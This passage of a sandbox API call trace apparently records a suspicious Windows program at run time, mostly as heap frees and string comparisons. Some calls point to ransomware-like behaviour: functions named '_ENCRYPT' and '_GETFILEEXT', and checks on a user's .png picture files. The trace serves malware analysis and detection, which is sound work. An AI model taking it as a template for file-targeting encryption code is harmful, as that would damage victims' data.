lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0189.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.244] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.244] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.244] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0189.244] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.245] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.245] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.245] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.246] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.246] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.246] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.246] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.246] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0189.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.247] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.247] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.247] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.247] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05e48a0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0x283be5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc0c, ftLastWriteTime.dwLowDateTime=0x283be5b0, ftLastWriteTime.dwHighDateTime=0x1d5dc0c, nFileSizeHigh=0x0, nFileSizeLow=0xa1fa, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="EVGfmjA.png", cAlternateFileName="")) returned 0x90add8 [0189.247] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.247] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.247] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05e48a0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0x283be5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc0c, ftLastWriteTime.dwLowDateTime=0x283be5b0, ftLastWriteTime.dwHighDateTime=0x1d5dc0c, nFileSizeHigh=0x0, nFileSizeLow=0xa1fa, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="EVGfmjA.png", cAlternateFileName="")) returned 0x90add8 [0189.247] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0189.248] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\EVGfmjA.png\"", cchCount1=10, 